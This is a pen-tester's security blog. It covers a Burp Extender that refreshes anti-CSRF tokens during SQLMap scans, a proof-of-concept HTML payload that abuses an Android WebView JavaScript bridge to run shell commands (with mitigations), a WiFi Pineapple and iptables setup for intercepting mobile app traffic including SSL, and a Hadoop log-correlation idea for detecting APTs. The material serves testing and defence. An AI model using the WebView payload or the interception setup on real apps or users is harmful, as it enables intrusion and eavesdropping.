Monday, July 8, 2013

Anti-CSRF token support using Burp Extender API

I was recently faced with a problem while using SQLMap to scan a URL for SQL injection vulnerabilities. After every POST request to the server, my anti-CSRF token would get reset, and I could not figure out a way to retrieve the anti-CSRF token from the response body and set it in the next request sent by SQLMap.
I overcame this issue using Burp's Extender functionality and proxying SQLMap traffic through Burp. For those who are not familiar with Burp Extender, check out http://portswigger.net/burp/extender/. Burp Extender allows us to hook into various events of the Burp application.
I've written a small program that records the anti-CSRF token from the server response and adds it back to the next request sent to the server.


Download API : http://portswigger.net/burp/extender/api/burp_extender_api.zip
Follow the setup instruction present in http://blog.portswigger.net/2009/04/using-burp-extender.html

Modify the processHttpMessage method as follows:

@Override
public void processHttpMessage(int toolFlag, boolean messageIsRequest, IHttpRequestResponse messageInfo) {

    // Host name of the application you want to test.
    final String HOST = "m.test.isecpartners.com";
    // Markup that precedes the anti-CSRF token value in the response body.
    final String MARKER = "<input type=\"hidden\" name=\"token\" id=\"token\" value=\"";

    IHttpService httpService = messageInfo.getHttpService();

    if (!messageIsRequest) {
        // This is a response: record the anti-CSRF token.
        if (HOST.equalsIgnoreCase(httpService.getHost())) {
            String responseString = new String(messageInfo.getResponse());
            int start = responseString.indexOf(MARKER);
            if (start != -1) {
                // Extract the anti-CSRF token value (everything up to the closing quote).
                int valueStart = start + MARKER.length();
                int valueEnd = responseString.indexOf('"', valueStart);
                String token = responseString.substring(valueStart, valueEnd);
                stdout.println("Response Token: " + token);
                globalToken = token;
            }
        }
    } else {
        // This is a request: replace the stale anti-CSRF token with globalToken.
        if (HOST.equalsIgnoreCase(httpService.getHost())) {
            byte[] byteMessage = messageInfo.getRequest();
            IParameter token = helpers.getRequestParameter(byteMessage, "token");
            if (token != null && !globalToken.isEmpty()) {
                stdout.println("Request Token: " + token.getValue() + " Global Token: " + globalToken);
                // Remove the stale anti-CSRF token from the request.
                byteMessage = helpers.removeParameter(byteMessage, token);
                // Add the recorded anti-CSRF token to the request.
                IParameter newToken = helpers.buildParameter("token", globalToken, IParameter.PARAM_BODY);
                byteMessage = helpers.addParameter(byteMessage, newToken);
                // Set the request with the new token.
                messageInfo.setRequest(byteMessage);
            }
        }
    }
}
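The extraction logic can also be exercised outside Burp. A minimal standalone sketch, assuming the token is carried in a hidden input field like the one above (a regex keeps it independent of the token's length):

```java
import java.util.regex.Matcher;
import java.util.regex.Pattern;

public class TokenExtract {
    // Assumed markup: <input type="hidden" name="token" id="token" value="...">
    static final Pattern TOKEN =
            Pattern.compile("name=\"token\"[^>]*value=\"([^\"]*)\"");

    // Returns the anti-CSRF token from a response body, or null if absent.
    static String extract(String responseBody) {
        Matcher m = TOKEN.matcher(responseBody);
        return m.find() ? m.group(1) : null;
    }
}
```

A regex like this survives changes in the token's length or in attribute ordering, which fixed substring offsets do not.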

Run the extender jar file:
java -Xmx512m -classpath burpextender.jar;burp.jar burp.StartBurp
(On Linux or OS X, use ':' instead of ';' as the classpath separator.) Output generated by the extender plugin can be seen in the Extender tab's output sub-tab.


This can also be used with the Burp Scanner tool, which modifies the same request repeatedly without considering the values present in the response.



There are many more possibilities with the Burp Extender API.

Remote code execution in Android WebViews

Enabling a JavaScript interface with the addJavascriptInterface method allows JavaScript hosted in a WebView to directly invoke methods in the app. Any untrusted content hosted in the WebView can potentially use reflection to discover the public methods of the JavaScript interface object and make use of them. An attacker can also use reflection to replace contents in the application's private directory.
In the code below, androidbridge is the exposed JavaScript bridge.


<!DOCTYPE html>
<html>
<head>
<meta content="text/html;charset=UTF-8" http-equiv="content-type">
<script>
function execute(cmdArgs)
{
  var temp = androidbridge.getClass().forName("java.lang.Runtime").getMethod("getRuntime", null).invoke(null, null);
  temp.exec(cmdArgs);
  return 1;
}
var maliciousContents = "isecPartners";
execute(["/system/bin/sh", "-c", "echo '" + maliciousContents + "' > /data/data/com.goodcompany.private.directory/evilFile"]);
</script>
</head>
<body>No content here</body>
</html>


Here "androidbridge" is the name of the injected Java object (JSInterface) in the WebView.

webView.addJavascriptInterface(new JSInterface(this), "androidbridge");
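The reflection chain that the hosted JavaScript abuses can be reproduced on a plain JVM. A minimal sketch, where Bridge is a hypothetical stand-in for the JSInterface object:

```java
public class ReflectionEscalation {
    // Hypothetical stand-in for the JSInterface object exposed to the WebView.
    public static class Bridge {
        public String greet() { return "hi"; }
    }

    // The same chain the hosted JavaScript uses: starting from any exposed
    // object, reflection walks from its Class to java.lang.Runtime.
    static Object escalate(Object exposed) {
        try {
            return exposed.getClass()
                    .forName("java.lang.Runtime")
                    .getMethod("getRuntime")
                    .invoke(null);
        } catch (ReflectiveOperationException e) {
            return null;
        }
    }
}
```

Note that the attack needs nothing from Bridge itself beyond the getClass() method every Object inherits.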

Solution: Beginning with Android 4.2, developers must explicitly annotate public methods with @JavascriptInterface to make them accessible to hosted JavaScript. Note that this protection takes effect only if the application's targetSdkVersion is set to 17 or higher, so set targetSdkVersion to 17 or higher to ensure that hosted JavaScript can access only explicitly annotated Java methods.

Another mitigation is to prevent navigation to domains outside a whitelist: override shouldOverrideUrlLoading, check whether the domain is allowed, and open the URL in the default Android browser rather than the WebView if it is not trusted.
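The whitelist check itself can be sketched in plain Java (the example.com hosts are hypothetical); in shouldOverrideUrlLoading, a false result would send the URL to the default browser instead of the WebView:

```java
import java.net.URI;
import java.util.Arrays;
import java.util.HashSet;
import java.util.Set;

public class UrlWhitelist {
    // Hypothetical whitelist of trusted hosts.
    static final Set<String> ALLOWED =
            new HashSet<>(Arrays.asList("m.example.com", "www.example.com"));

    // Returns true only when the URL parses and its host is whitelisted;
    // malformed URLs are treated as untrusted.
    static boolean isTrusted(String url) {
        try {
            String host = URI.create(url).getHost();
            return host != null && ALLOWED.contains(host.toLowerCase());
        } catch (IllegalArgumentException e) {
            return false;
        }
    }
}
```

Comparing the parsed host, rather than doing a substring match on the raw URL, avoids bypasses like http://m.example.com.evil.org/.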


Ref:
[1] http://developer.android.com/reference/android/webkit/WebView.html#addJavascriptInterface%28java.lang.Object,%20java.lang.String%29
[2] http://android-developers.blogspot.com/2013/02/security-enhancements-in-jelly-bean.html

Monday, December 12, 2011

Testing mobile applications where setting a proxy is not an option.

Advantages :

  1.  This is a one-time process and can be easily reused when required.
  2.  Robust and fast.

Successfully tested against :

  1.  Mobile operating systems that do not support setting a proxy.
  2.  Mobile operating systems in development.
  3.  Mobile application assessment.

There are often situations where we need to test applications on platforms that don't allow us to set a proxy, especially mobile platforms that aren't finished yet and either don't offer an emulator to test the apps or require too much time and effort to set up and work in an emulator. I recently tried the WiFi Pineapple [1] for this purpose and found it very convenient and easy to use. A Pineapple and a Backtrack Linux machine are handy tools for any mobile application/platform pen test. These steps are for the first version of the Pineapple. [2] (The current one is the WiFi Pineapple Mark III and may require a different setup process.) The Pineapple cannot be used for pen-test purposes right out of the box, and some modifications are necessary on both the Pineapple and the Backtrack Linux machine. There is a good post on the Pineapple forums about setting up the internet connection here. [3]
I have summarized the steps given in the forum with some additional information here.

Tools needed to perform the set up:

  1. WiFi pineapple ( Any router that runs openwrt )
  2. Backtrack 5 ( Any linux distribution with burp, wireshark and other required tools)
  3. VMWare ( Any virtualization software ) If you are running the above linux OS in a VM.
  4. Ethernet to USB converter.
  5. Ethernet Cable.

STEP 1: The out-of-the-box Pineapple has the following configuration:
Default Settings
   Wireless SSID: Pineapple
   Wireless Encryption: None
   Wireless IP Address: 192.168.1.1
   Root password: pineapplesareyummy

Configuration files
   /etc/config/wireless
   /etc/config/network

Connect the pineapple to your system using the Ethernet cable. SSH into the pineapple using the above default settings. Edit the /etc/config/dhcp configuration file so it looks like this.

config dnsmasq
option domainneeded 1
option boguspriv 1
option filterwin2k '0' #enable for dial on demand
option localise_queries 1
option local '/lan/'
option domain 'lan'
option expandhosts 1
option nonegcache 0
option authoritative 1
option readethers 1
option leasefile '/tmp/dhcp.leases'
option resolvfile '/tmp/resolv.conf.auto'
config dhcp lan
option interface lan
option start 100
option limit 150
option leasetime 12h
option ignore 0
list dhcp_option 3,10.110.0.1
list dhcp_option 6,10.110.0.2,208.67.222.222
list dhcp_option 6,10.110.0.2,8.8.8.8
config dhcp wan
option interface wan
option ignore 1
option start 100
option limit 150
option leasetime 12h
list dhcp_option 3,10.110.0.1
list dhcp_option 6,10.110.0.2,208.67.222.222
list dhcp_option 6,10.110.0.2,8.8.8.8
Edit the /etc/config/network configuration file so it looks like this.
config 'interface' 'loopback'
option 'ifname' 'lo'
option 'proto' 'static'
option 'ipaddr' '127.0.0.1'
option 'netmask' '255.0.0.0'
config 'interface' 'lan'
option 'ifname' 'eth0'
option 'type' 'bridge'
option 'proto' 'static'
option 'netmask' '255.255.255.0'
option 'macaddr'
option 'ipaddr' '10.110.0.2'
option 'ip6addr'
option 'gateway' '10.110.0.1'
option 'ip6gw'
option 'dns'
Reboot the pineapple.

STEP 2: Setting up Backtrack 5 (virtual machine). The eth1 interface can be connected to your host machine's network either by a direct or a bridged connection; this is the default internet interface for the Linux virtual machine (1- ifconfig eth1 up 2- dhcpcd eth1). I purchased an Ethernet-to-USB converter here to connect the Pineapple's Ethernet directly to one of the Backtrack Linux interfaces; usually it is eth3 and gets detected automatically. Once you have plugged it in, use the following commands to bring up the eth3 interface on the Linux VM (1- ifconfig eth3 up 2- dhcpcd eth3).

Finally, run this script to forward incoming traffic from the Pineapple's interface (eth3) to the internet-connected interface (eth1).

#!/bin/bash
#
# SET GLOBAL VARIABLES
#

FON_IP_BLOCK="10.110.0.0/24"
NETMASK="255.255.255.0"
GW_NIC_IP="10.110.0.1"

# Default network interfaces
#
Wan="eth1" # Connected to the internet
Lan="eth3" # Connected to the Pineapple (USB Ethernet adapter)
Ssl="N"

read -p "Do you want to proxy SSL traffic? Y/N: " Ssl

# Get the gateway IP address and store it in the variable $Gw
#
Gw=`netstat -nr | awk 'BEGIN {while ($3!="0.0.0.0") getline; print $2}'`

# Set $Lan's IP address to 10.110.0.1 and netmask 255.255.255.0
#
ifconfig $Lan $GW_NIC_IP netmask $NETMASK

echo "$Lan is given the IP address of $GW_NIC_IP & netmask $NETMASK"
echo ""

# Enable IPv4 forwarding; if it is already enabled, this does nothing
#
IPFWD=`cat /proc/sys/net/ipv4/ip_forward`
if [ $IPFWD -eq 1 ]; then
    echo "IP forwarding enabled!"
    echo ""
else
    echo '1' > /proc/sys/net/ipv4/ip_forward
    echo "IP forwarding enabled!"
    echo ""
fi

# The next IF block sets all the iptables rules
# and the default route
#
iptables --version > /dev/null 2>&1
if [ $? -eq 0 ]; then

    # Clear all iptables chains and rules
    #
    iptables -X
    iptables -F
    iptables -F -t nat
    echo "All iptables chains and rules cleared. . . Setting new iptables rules"
    echo ""

    # If the user answered Y/y to the SSL question, redirect traffic on ports
    # 80 and 443 from $Lan to the local listeners on those same ports (Burp in
    # this setup; point the rule at port 10000 instead if you use sslstrip).
    # Otherwise only port 80 is redirected.
    #
    if [ $Ssl == "y" -o $Ssl == "Y" -o $Ssl == "yes" ]; then
        iptables -t nat -A PREROUTING -i $Lan -p tcp --destination-port 80 -j REDIRECT --to-ports 80
        iptables -t nat -A PREROUTING -i $Lan -p tcp --destination-port 443 -j REDIRECT --to-ports 443
        #iptables -t nat -A PREROUTING -i $Lan -p tcp --destination-port 9997 -j REDIRECT --to-ports 9997
    else
        echo "skipping SSL redirection"
        iptables -t nat -A PREROUTING -i $Lan -p tcp --destination-port 80 -j REDIRECT --to-ports 80
    fi

    # Set up IPv4 forwarding from $Wan to $Lan
    #
    iptables -A FORWARD -i $Wan -o $Lan -s $FON_IP_BLOCK -m state --state NEW -j ACCEPT
    iptables -A FORWARD -m state --state ESTABLISHED,RELATED -j ACCEPT
    iptables -A POSTROUTING -t nat -j MASQUERADE
    echo "iptables configured..."
    echo ""

    # Replace the default route
    #
    route del default
    echo "Default route removed. . ."

    route add default gw $Gw $Wan
    echo "Default route set to $Gw through $Wan"
    echo ""

else
    echo "Please run as root or install iptables..."
fi

exit


Finally, start Burp and listen on port 80. You may optionally start Wireshark, listen on interface eth3, and study the traffic. Connect your non-proxy-aware client to the Pineapple's SSID.
Proxying SSL traffic: while executing the above script, you are asked whether you want to proxy SSL traffic. Enter Y if you want to capture SSL traffic in Burp, then run Burp listening on port 443.
Note: Do not use OpenJDK, which is installed by default on Backtrack; it may cause SSL handshake failures. You will need to install the Sun version of Java on Backtrack for this.
# java -Xmx512m -Dsun.security.ssl.allowUnsafeRenegotiation=true -jar burpsuite_pro_v1.3.jar
Additionally, you will need to run Burp in invisible proxy mode and use the "generate a CA-signed certificate with a specific hostname" option. “You should use this option if you are using invisible proxy mode with SSL connections - in this scenario, per-host certificates cannot be generated because the browser does not send a CONNECT request, and so the SSL negotiation precedes the receipt of the host information from the browser. The fixed host certificate is signed by Burp's CA certificate, which you can install in your client so that the host certificate is accepted without any alerts (provided you specify the correct hostname).” [Burp help files]

[1]http://hakshop.myshopify.com/collections/frontpage/products/wifi-pineapple
[3]http://forums.hak5.org/index.php?s=af48684cd6d19afc977ffe7b4fbea412&showtopic=15200

Friday, September 23, 2011

Using Hadoop-MapReduce for faster log correlation to detect APTs.

The only well-known method of detecting an APT is log analysis and correlation. “You need to put into place the processes and possibly the technology necessary to cultivate the security logs and pinpoint the information needed to keep the infrastructure secure. These efforts absolutely require some type of log management and correlation.” Correlation could be rule-based, statistical, or algorithmic, or any other method that relates various event logs to each other in order to detect a particular anomaly in the information system. Also, as Alex Stamos of iSEC Partners has pointed out in his paper Aurora Response Recommendations [2], the companies with the most effective response to these attacks have utilized their central log aggregation mechanisms to track the actions of the attackers.
These logs can be present in plenty of locations on a system, and the log files themselves can be very large. At the level of an enterprise or a network of systems, manual log correlation and analysis is not a practical approach, since the amount of work involved is substantial.
The solution I propose is to use parallel programming, specifically the Hadoop-MapReduce framework. Hadoop-MapReduce is a programming model and software framework for writing applications that rapidly process vast amounts of data in parallel on large clusters of compute nodes. [21] In MapReduce, the data-processing primitives are called mappers and reducers. The framework scales an application to run over many (thousands of) machines in a cluster through a configuration change alone. It is appropriate for log correlation and analysis because logs can inherently be processed in parallel: hunting for a specific event or set of events in thousands of log files (each sometimes holding terabytes of data) across various servers is infeasible, or far too slow, with a single-node, non-parallel approach.


In a non-Hadoop distributed approach, if all the logs are stored on one central storage server, then the bottleneck is the bandwidth of that server; having more machines for processing only helps up to a certain point, until the storage server can't keep up. To remove this bottleneck, you also need to split the logs among the processing machines so that each machine processes only the logs stored on it. The storage and processing of the data have to be tightly coupled in data-intensive distributed applications. Hadoop differs from traditional distributed data processing schemes: it focuses on moving code to the data instead of vice versa. [23 - Chapter 1] To see how Hadoop fits into the design of distributed systems, I suggest reading [23] and [22].

Implementation of Hadoop-MapReduce for Log Correlation

Step 1: The starting point for a majority of APT attacks is one of the applications crashing, so the first step is to look for any such crashes. On a standalone Windows system, application errors or crashes are recorded in the Application event log. This process can be automated: we can write a Java program that parses just the application log file and detects any such log entries. Once the crash or exception in the application is noticed, we record the date and time of the crash.
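A sketch of this crash-detection step, assuming a simplified one-line-per-entry log format (a real Windows event log would need a proper parser):

```java
import java.util.ArrayList;
import java.util.List;

public class CrashDetector {
    // Assumed line format: "yyyy-MM-dd HH:mm:ss <event description>".
    static List<String> findCrashTimes(List<String> applicationLog) {
        List<String> crashTimes = new ArrayList<>();
        for (String line : applicationLog) {
            // Record the date and time (the first two fields) of each crash entry.
            if (line.contains("Application Error")) {
                String[] fields = line.split(" ");
                crashTimes.add(fields[0] + " " + fields[1]);
            }
        }
        return crashTimes;
    }
}
```

The recorded timestamps define the time window that the later MAP step filters on.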

Step 2: Our next step is to bring all the related log file entries together. Because the MAP function runs on different nodes, it is important to gather together the entries across different log files that fall in the same date and time range. This step is performed by the MAP function. The input and output of the initial MAP function are as follows:


Our MAP function does not perform much computation on the log data; its main aim is to gather together the data from the various log files that falls in the required time range, so the input can be passed directly through as the output. We can also perform some cleanup here: log entries we consider unnecessary, as well as entries outside our time range, can be omitted. We can also have a utility function that takes dates and times in different formats and converts them to a timestamp, which makes them easy to compare and sort. The output of this MAP function, and eventually of all MAP functions across all nodes, goes to the MapReduce framework before reaching the REDUCE function. The framework sorts and groups the different pairs by key. One important aspect to note here is that the sorting happens in ascending order, i.e. the latest event is at the bottom of the list. Values with the same keys (timestamps) are grouped together. This input then goes into the REDUCE function.
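The MAP step described above can be sketched as a plain-Java function, assuming a "yyyy-MM-dd HH:mm:ss" timestamp prefix on each log line (a real implementation would subclass Hadoop's Mapper and emit through its context):

```java
import java.time.LocalDateTime;
import java.time.ZoneOffset;
import java.time.format.DateTimeFormatter;
import java.util.AbstractMap.SimpleEntry;
import java.util.Map;

public class LogMap {
    static final DateTimeFormatter FMT = DateTimeFormatter.ofPattern("yyyy-MM-dd HH:mm:ss");

    // Parse the line's timestamp, normalize it to epoch seconds (the utility
    // conversion mentioned above), and emit a (timestamp, line) pair only if
    // the entry falls inside the crash window; otherwise emit nothing (null).
    static Map.Entry<Long, String> map(String line, long windowStart, long windowEnd) {
        String stamp = line.substring(0, 19);  // assumed fixed-width timestamp prefix
        long key = LocalDateTime.parse(stamp, FMT).toEpochSecond(ZoneOffset.UTC);
        return (key >= windowStart && key <= windowEnd) ? new SimpleEntry<>(key, line) : null;
    }
}
```

Using the epoch-second key means the framework's shuffle phase sorts the surviving entries chronologically for free.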



We have two places where we can omit unwanted log data. One is the MAP function, where we can write a filter to remove unwanted log entries before outputting the values. The other is the REDUCE function, where we can remove unwanted entries once we have the sorted data. If we wait until the REDUCE function to omit unwanted data, resources are wasted because the framework has to process it.

Now we have the relevant log data in the desired format, sorted appropriately. The input to the REDUCE program is all the potential log entries that need to be searched for any kind of intrusion attempt. We implement our behavior-based ranking system here and assign points to the various log entries. The logic is: "if a particular log entry contains any of the corresponding keywords from the keyword database, then based on the relevance of the log file we assign a value on a scale of 10 to that particular log entry." The value we assign is based on the significance of the log entry with respect to the application that crashed. For example, a log entry that says a file was downloaded into the system32 folder during that time window would have a value of '8', whereas a log entry that says some completely unrelated application made some registry changes would have a value of '0'.

There are a couple of factors that favor this approach. First, as we parse the log entries we discover new keywords that can be added to the keyword database, which increases the relevance of log entries higher up in the list. The keyword database would initially be empty, or it could contain the name or process id of the application that crashed. Second, the log entries are sorted in ascending order. The relevance values of the different log entries can be added up, and the final value is the output of the program.
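The ranking logic of the REDUCE step can be sketched in plain Java; the keywords and their weights here are hypothetical:

```java
import java.util.List;
import java.util.Map;

public class LogReduce {
    // Hypothetical keyword-to-relevance weights on a scale of 10.
    static final Map<String, Integer> KEYWORDS = Map.of(
            "system32", 8,
            "iexplore.exe", 6,
            "registry", 0);

    // Simulates the REDUCE step: sum the relevance of each time-sorted log
    // entry; the total is the intrusion score for the crash window.
    static int score(List<String> sortedEntries) {
        int total = 0;
        for (String entry : sortedEntries) {
            for (Map.Entry<String, Integer> kw : KEYWORDS.entrySet()) {
                if (entry.contains(kw.getKey())) {
                    total += kw.getValue();
                }
            }
        }
        return total;
    }
}
```

Comparing the total against an experimentally chosen threshold would then flag a window as a likely intrusion.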


Tests could be conducted to find an optimal relevance value that signifies that an intrusion has taken place in the system.

There are quite a few problems with this approach. More on the problems and solutions in the next post.

[21] http://hadoop.apache.org/mapreduce/
[22] Hadoop in Action, by Chuck Lam
[23] Hadoop: The Definitive Guide, by Tom White